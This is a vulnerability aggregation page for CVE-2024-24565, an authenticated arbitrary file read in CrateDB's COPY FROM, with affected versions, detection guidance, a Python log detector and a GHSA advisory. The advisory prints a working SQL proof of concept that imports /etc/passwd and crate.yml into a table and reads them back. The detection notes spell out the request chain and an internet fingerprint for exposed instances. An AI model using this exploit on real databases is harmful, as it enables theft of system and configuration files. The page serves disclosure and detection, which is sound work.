CVE-2024-24565
Published 2024-01-30
Priority P347 · medium · 6.5 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 3.08% (86.1th percentile)
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crate | crate | < 5.3.9 | 5.3.9 |
| crate | crate | — | — |
| crate | crate | — | — |
| crate | crate | — | — |
| cratedb | cratedb | < 5.3.9 | 5.3.9 |
| cratedb | cratedb | >= 5.4.0 < 5.4.8 | 5.4.8 |
| cratedb | cratedb | >= 5.5.0 < 5.5.4 | 5.5.4 |
| cratedb | cratedb | >= 5.6.0 < 5.6.1 | 5.6.1 |
Detection & IOCs
yara
```
regex('root:.*:0:0:', body_3)
```
- Detect exploitation attempts by monitoring POST requests to the CrateDB SQL endpoint '/_sql?types' containing the COPY FROM SQL statement referencing local filesystem paths (e.g., '/etc/passwd').
- Successful exploitation is confirmed when the HTTP response body to a SELECT query against the created table matches the regex 'root:.*:0:0:', indicating /etc/passwd content was imported.
- A full exploit chain consists of three sequential POST requests to /_sql?types: (1) CREATE TABLE with a STRING column, (2) COPY FROM a local file path, (3) SELECT * to exfiltrate the file contents. Monitor for this pattern.
- FOFA/Shodan fingerprint for exposed CrateDB instances: search for title="CrateDB" to identify potentially vulnerable internet-facing nodes.
- Content-Type header 'application/json; charset=UTF-8' is used in all exploit requests to the CrateDB SQL API endpoint.
- Exploitation requires authentication: the attacker must have valid credentials to the CrateDB instance before issuing COPY FROM SQL statements.
- The vulnerability is patched in CrateDB versions 5.3.9, 5.4.8, 5.5.4, and 5.6.1. Detection rules should be scoped to instances running versions prior to these fixes.
- The COPY FROM exploit uses the 'csv' format with 'header=false' option to bypass any header-row validation when importing arbitrary files.
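The monitoring guidance above, as an added example (not taken from the advisory, the Nuclei template or CrateDB): a Python pass over proxy-logged POST bodies to `/_sql` that flags `COPY FROM` sources resolving to local paths outside an approved import directory, and correlates the CREATE TABLE, COPY FROM, SELECT sequence per client. The log tuple layout, the `{"stmt": ...}` request bodies in the sample, `ALLOWED_DIRS` and the 300-second window are assumptions, as is treating a source with no URI scheme as a local file.

```python
import json
import posixpath
import re
from collections import defaultdict

# Constructed sample: (epoch seconds, client, request path, POST body) as a reverse proxy might log it.
SAMPLE_LOG = [
    (100, "10.0.0.7", "/_sql?types", '{"stmt": "CREATE TABLE info_leak(info_leak STRING)"}'),
    (101, "10.0.0.7", "/_sql?types", '{"stmt": "COPY info_leak FROM \'/etc/passwd\' with (format=\'csv\', header=false)"}'),
    (102, "10.0.0.7", "/_sql?types", '{"stmt": "SELECT * FROM info_leak"}'),
    (200, "10.0.0.9", "/_sql", '{"stmt": "COPY metrics FROM \'s3://bucket/metrics.csv\'"}'),
    (300, "10.0.0.9", "/_sql", '{"stmt": "COPY metrics FROM \'/data/import/metrics.csv\'"}'),
]
ALLOWED_DIRS = ("/data/import/",)  # hypothetical: directories approved for bulk imports
CREATE_RE = re.compile(r"^\s*CREATE\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?([\w.\"]+)", re.I)
COPY_RE = re.compile(r"^\s*COPY\s+([\w.\"]+).*?\bFROM\s+'([^']*)'", re.I | re.S)
SELECT_RE = re.compile(r"^\s*SELECT\b.*?\bFROM\s+([\w.\"]+)", re.I | re.S)

def local_path(uri):
    """Normalised filesystem path a COPY FROM source points at, or None for remote schemes."""
    if uri.lower().startswith("file://"):
        uri = uri[len("file://"):]
    elif "://" in uri:
        return None
    return posixpath.normpath(uri)  # collapses ../ so traversal cannot hide under an allowed dir

def analyze(log, window=300):
    """Flag local-file COPY FROM and the CREATE -> COPY -> SELECT sequence per client."""
    findings, state = [], defaultdict(dict)  # state: client -> table -> recorded events
    for ts, client, path, body in log:
        try:
            stmt = json.loads(body)["stmt"] if path.startswith("/_sql") else None
        except (ValueError, KeyError, TypeError):
            continue  # body is not a JSON object carrying a statement
        if not isinstance(stmt, str):
            continue
        tables = state[client]
        if m := CREATE_RE.match(stmt):
            tables[m.group(1).lower()] = {"created": ts}
        elif m := COPY_RE.match(stmt):
            src = local_path(m.group(2))
            if src and not src.startswith(ALLOWED_DIRS):
                findings.append((client, "copy_from_local_file", src))
                tables.setdefault(m.group(1).lower(), {})["copied"] = src
        elif m := SELECT_RE.match(stmt):
            hit = tables.get(m.group(1).lower(), {})
            if "copied" in hit and "created" in hit and ts - hit["created"] <= window:
                findings.append((client, "create_copy_select_chain", hit["copied"]))
    return findings
```

Calling `analyze(SAMPLE_LOG)` yields two findings for client 10.0.0.7 and none for the `s3://` import or the import from the approved directory.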
GHSA
CrateDB database has an arbitrary file read vulnerability
ghsa·2024-01-30
CVE-2024-24565 [MEDIUM] CWE-22 CrateDB database has an arbitrary file read vulnerability
### Summary
There is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.
### Details
There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
### PoC
```
CREATE TABLE info_leak(info_leak STRING);
COPY info_leak FROM '/etc/passwd' with (format='csv', header=false);
-- or:
COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);
SELECT * FROM info_leak;
```
### Impact
This vulnerability affects all current
OSV
CrateDB database has an arbitrary file read vulnerability
osv·2024-01-30
CVE-2024-24565 [MEDIUM] CrateDB database has an arbitrary file read vulnerability
No detection rules found.
Nuclei
CrateDB Database - Arbitrary File Read
nuclei·CVSS 6.5
CVE-2024-24565 [MEDIUM] CrateDB Database - Arbitrary File Read
CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.
Template:
```
id: CVE-2024-24565
info:
  name: CrateDB Database - Arbitrary File Read
  author: DhiyaneshDK
  severity: medium
  description: |
    CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database table
```